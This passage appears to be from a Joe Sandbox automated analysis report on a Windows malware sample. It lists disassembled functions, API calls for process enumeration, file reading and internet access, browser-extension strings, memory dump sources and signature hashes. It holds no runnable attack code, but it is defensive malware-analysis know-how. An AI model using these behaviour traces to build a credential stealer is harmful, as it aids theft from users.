                                                                                                                                                                                                                                                                                        • Part of subcall function 00410340: lstrcpyA.KERNEL32(00000000,00000000,00000001,?,?,004172A5,?,00420AD0,0042150A,?,?,?,?,00418606), ref: 00410382
                                                                                                                                                                                                                                                                                        • Part of subcall function 00410340: lstrcatA.KERNEL32(00000000,?,?,?,004172A5,?,00420AD0,0042150A,?,?,?,?,00418606), ref: 0041038A
                                                                                                                                                                                                                                                                                        • Part of subcall function 00410290: lstrcpyA.KERNEL32(00000000,?,?,?,?,004172C1,?,?,00000000,?,00420AD0,0042150A), ref: 004102C8
                                                                                                                                                                                                                                                                                      • Process32Next.KERNEL32(00000000,00000128), ref: 0041107A
                                                                                                                                                                                                                                                                                      • CloseHandle.KERNEL32(00000000), ref: 00411085
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.3275974371.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3275913936.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276066539.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276129797.0000000000423000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.000000000044D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.0000000000477000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.0000000000480000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.00000000004AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.00000000004B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.00000000004CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.00000000004D7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.00000000004DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.000000000059F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.00000000005AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.0000000000634000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3277535270.0000000000637000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_gVKsiQIHqe.jbxd
                                                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: Process32lstrcpy$Next$CloseCreateFirstHandleSnapshotToolhelp32lstrcatlstrlen
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 562399079-0
                                                                                                                                                                                                                                                                                      • Opcode ID: 58348e437a27bc0644566453b947fbefec51a5999494bbe316478c62b720522d
                                                                                                                                                                                                                                                                                      • Instruction ID: ad10719cd445ab04cf283b63720ee16ebf2a6e79acd2848d50ffecdf406f3b24
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 58348e437a27bc0644566453b947fbefec51a5999494bbe316478c62b720522d
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 571182743002146FD7106B62AC89FFFBB9DEFC9754F04542EB50A86291DE7C9884C6A6
                                                                                                                                                                                                                                                                                      Function 0040C530 Relevance: 6.2, APIs: 2, Strings: 2, Instructions: 184stringCOMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                        • Part of subcall function 00410200: lstrcpyA.KERNEL32(00000000,?,?,?,?,004175C6,?), ref: 00410223
                                                                                                                                                                                                                                                                                        • Part of subcall function 004076B0: CreateFileA.KERNEL32 ref: 004076EE
                                                                                                                                                                                                                                                                                        • Part of subcall function 004076B0: GetFileSizeEx.KERNEL32(00000000,?), ref: 00407700
                                                                                                                                                                                                                                                                                        • Part of subcall function 004076B0: LocalAlloc.KERNEL32(00000040,003694E8), ref: 00407723
                                                                                                                                                                                                                                                                                        • Part of subcall function 004076B0: ReadFile.KERNEL32(00000000,A075FFA4,003694E8,?,00000000), ref: 00407744
                                                                                                                                                                                                                                                                                        • Part of subcall function 004076B0: LocalFree.KERNEL32(A075FFA4), ref: 00407763
                                                                                                                                                                                                                                                                                        • Part of subcall function 004076B0: CloseHandle.KERNEL32(00000000), ref: 0040776C
                                                                                                                                                                                                                                                                                        • Part of subcall function 004115B0: LocalAlloc.KERNEL32(00000040,?,?,00000000,?,?,00416A58,00000000,00000000), ref: 004115D4
                                                                                                                                                                                                                                                                                        • Part of subcall function 004101C0: lstrcpyA.KERNEL32(00000000,?,00000001,?,?,?,00417292,0042150A,?,?,?,?,00418606), ref: 004101E4
                                                                                                                                                                                                                                                                                        • Part of subcall function 00410340: lstrlenA.KERNEL32(?,?,?,?,?,004172A5,?,00420AD0,0042150A,?,?,?,?,00418606), ref: 00410359
                                                                                                                                                                                                                                                                                        • Part of subcall function 00410340: lstrcpyA.KERNEL32(00000000,00000000,00000001,?,?,004172A5,?,00420AD0,0042150A,?,?,?,?,00418606), ref: 00410382
                                                                                                                                                                                                                                                                                        • Part of subcall function 00410340: lstrcatA.KERNEL32(00000000,?,?,?,004172A5,?,00420AD0,0042150A,?,?,?,?,00418606), ref: 0041038A
                                                                                                                                                                                                                                                                                        • Part of subcall function 00410290: lstrcpyA.KERNEL32(00000000,?,?,?,?,004172C1,?,?,00000000,?,00420AD0,0042150A), ref: 004102C8
                                                                                                                                                                                                                                                                                        • Part of subcall function 004102E0: lstrcpyA.KERNEL32(00000000,00000000,?,?,?,?,?,00417585,?,?,?,C:\ProgramData\,0042150A,?,?,0000000C), ref: 00410320
                                                                                                                                                                                                                                                                                        • Part of subcall function 004102E0: lstrcatA.KERNEL32(00000000,?,?,00417585,?,?,?,C:\ProgramData\,0042150A,?,?,0000000C), ref: 0041032A
                                                                                                                                                                                                                                                                                      • StrStrA.SHLWAPI(?,00000000,?,?,?,?,?,00421363,0042150A,?,?,?,?,?,?,?), ref: 0040C5DA
                                                                                                                                                                                                                                                                                      • lstrlenA.KERNEL32(00000000,?,?,?,?,?,?,?,?,00000010,00000000,?,0040CC78,00000000,?,?), ref: 0040C5F8
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.3275974371.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3275913936.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276066539.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276129797.0000000000423000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.000000000044D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.0000000000477000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.0000000000480000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.00000000004AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.00000000004B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.00000000004CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.00000000004D7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.00000000004DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.000000000059F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.00000000005AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.0000000000634000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3277535270.0000000000637000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_gVKsiQIHqe.jbxd
                                                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: lstrcpy$FileLocal$Alloclstrcatlstrlen$CloseCreateFreeHandleReadSize
                                                                                                                                                                                                                                                                                      • String ID: ^userContextId=4294967295$moz-extension+++
                                                                                                                                                                                                                                                                                      • API String ID: 998311485-3310892237
                                                                                                                                                                                                                                                                                      • Opcode ID: adf5d0fcb4b42b563d8d2014ece056c47c6b9cd30f37acf02c607b39c5062cd4
                                                                                                                                                                                                                                                                                      • Instruction ID: e851882c1721239b6607cf2b57b0a0084f57c32a141c23d73fe3fe214d6676a2
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: adf5d0fcb4b42b563d8d2014ece056c47c6b9cd30f37acf02c607b39c5062cd4
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 14616131A107199BCB14FBB1C9D69EE7368AF08308F40455EB91657142EF7CAEC8CBA5
                                                                                                                                                                                                                                                                                      Function 00416EA0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 92stringCOMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • lstrlenA.KERNEL32(00000000), ref: 00416EC0
                                                                                                                                                                                                                                                                                        • Part of subcall function 00410200: lstrcpyA.KERNEL32(00000000,?,?,?,?,004175C6,?), ref: 00410223
                                                                                                                                                                                                                                                                                        • Part of subcall function 00403090: lstrlenA.KERNEL32(00000000,00000000,00000000,?,?,?), ref: 00403114
                                                                                                                                                                                                                                                                                        • Part of subcall function 00403090: StrCmpCA.SHLWAPI(?,https,0042150A,0042150A,0042150A,0042150A,00000000,00000000,00000000,00000000), ref: 0040316F
                                                                                                                                                                                                                                                                                        • Part of subcall function 00403090: InternetOpenA.WININET ref: 0040319E
                                                                                                                                                                                                                                                                                        • Part of subcall function 00410290: lstrcpyA.KERNEL32(00000000,?,?,?,?,004172C1,?,?,00000000,?,00420AD0,0042150A), ref: 004102C8
                                                                                                                                                                                                                                                                                      • StrCmpCA.SHLWAPI(00000000,ERROR,?,?,?,?,?), ref: 00416F77
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.3275974371.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3275913936.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276066539.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276129797.0000000000423000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.000000000044D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.0000000000477000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.0000000000480000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.00000000004AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.00000000004B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.00000000004CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.00000000004D7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.00000000004DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.000000000059F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.00000000005AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.0000000000634000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3277535270.0000000000637000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_gVKsiQIHqe.jbxd
                                                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: lstrcpylstrlen$InternetOpen
                                                                                                                                                                                                                                                                                      • String ID: ERROR
                                                                                                                                                                                                                                                                                      • API String ID: 3860179324-2861137601
                                                                                                                                                                                                                                                                                      • Opcode ID: a41e2adf9883fe8727359321e92805b2a13fc33e9da6a27b96af3066c66adf7c
                                                                                                                                                                                                                                                                                      • Instruction ID: 43c13bd387ffc7ea7dd124343602ed7a74854246be98469252eee39eb9cb9d78
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: a41e2adf9883fe8727359321e92805b2a13fc33e9da6a27b96af3066c66adf7c
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 5E3159719003099FCF00EFA5C9819EEBBB5BF48314F40445EF916A7251DB38A985CFA8
                                                                                                                                                                                                                                                                                      Function 00413E50 Relevance: 4.6, APIs: 3, Instructions: 112sleepsynchronizationthreadCOMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                        • Part of subcall function 00410290: lstrcpyA.KERNEL32(00000000,?,?,?,?,004172C1,?,?,00000000,?,00420AD0,0042150A), ref: 004102C8
                                                                                                                                                                                                                                                                                      • Sleep.KERNEL32(000003E8,?,?,?), ref: 00413F0F
                                                                                                                                                                                                                                                                                      • CreateThread.KERNEL32(00000000,00000000,00416EA0,?,00000000,00000000), ref: 00413F6C
                                                                                                                                                                                                                                                                                      • WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 00413F78
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.3275974371.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3275913936.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276066539.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276129797.0000000000423000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.000000000044D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.0000000000477000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.0000000000480000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.00000000004AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.00000000004B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.00000000004CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.00000000004D7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.00000000004DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.000000000059F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.00000000005AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.0000000000634000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3277535270.0000000000637000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_gVKsiQIHqe.jbxd
                                                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: CreateObjectSingleSleepThreadWaitlstrcpy
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 309549813-0
                                                                                                                                                                                                                                                                                      • Opcode ID: a8e46a763f59d357cb157831e2caf77c99b8258767ef6419c4d21c1fd91626e4
                                                                                                                                                                                                                                                                                      • Instruction ID: b65bf78c018c26f30e4a94ab22d84a19a40ae7d672281f86a08f23e214b62c4f
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: a8e46a763f59d357cb157831e2caf77c99b8258767ef6419c4d21c1fd91626e4
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: DA41B1312143409FD314EF61D895BDEB3E9ABC8304F40481EF48A97291DBBCAD89CB66
                                                                                                                                                                                                                                                                                      Function 00411B80 Relevance: 4.5, APIs: 3, Instructions: 40fileCOMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • CreateFileA.KERNEL32 ref: 00411BAD
                                                                                                                                                                                                                                                                                      • GetFileSizeEx.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,75918B60,?,?,004144A8), ref: 00411BC8
                                                                                                                                                                                                                                                                                      • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,75918B60,?), ref: 00411BD6
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.3275974371.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3275913936.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276066539.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276129797.0000000000423000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.000000000044D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.0000000000477000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.0000000000480000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.00000000004AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.00000000004B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.00000000004CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.00000000004D7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.00000000004DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.000000000059F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.00000000005AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.0000000000634000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3277535270.0000000000637000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_gVKsiQIHqe.jbxd
                                                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: File$CloseCreateHandleSize
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 1378416451-0
                                                                                                                                                                                                                                                                                      • Opcode ID: 5fd128bd3f60fd455576c9f3abd4fb244e883b3ced7d24e4adf943e857a9464f
                                                                                                                                                                                                                                                                                      • Instruction ID: ca78cda8c920ae7da25bbd8c375dff46666a8013e4c9ac76a8aa62fa3564fd1b
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 5fd128bd3f60fd455576c9f3abd4fb244e883b3ced7d24e4adf943e857a9464f
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: B50184729096148BC300EF7CD94559EBBF0BB85725F014729ED94D7260E730AA99CBD3
                                                                                                                                                                                                                                                                                      Function 00411CC0 Relevance: 4.5, APIs: 3, Instructions: 28COMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • OpenProcess.KERNEL32(00000410,00000000,?), ref: 00411CDD
                                                                                                                                                                                                                                                                                      • K32GetModuleFileNameExA.KERNEL32(00000000,00000000,?,00000104), ref: 00411CF4
                                                                                                                                                                                                                                                                                      • CloseHandle.KERNEL32(00000000), ref: 00411CFB
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.3275974371.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3275913936.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276066539.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276129797.0000000000423000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.000000000044D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.0000000000477000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.0000000000480000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.00000000004AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.00000000004B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.00000000004CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.00000000004D7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.00000000004DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.000000000059F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.00000000005AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.0000000000634000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3277535270.0000000000637000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_gVKsiQIHqe.jbxd
                                                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: CloseFileHandleModuleNameOpenProcess
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 3183270410-0
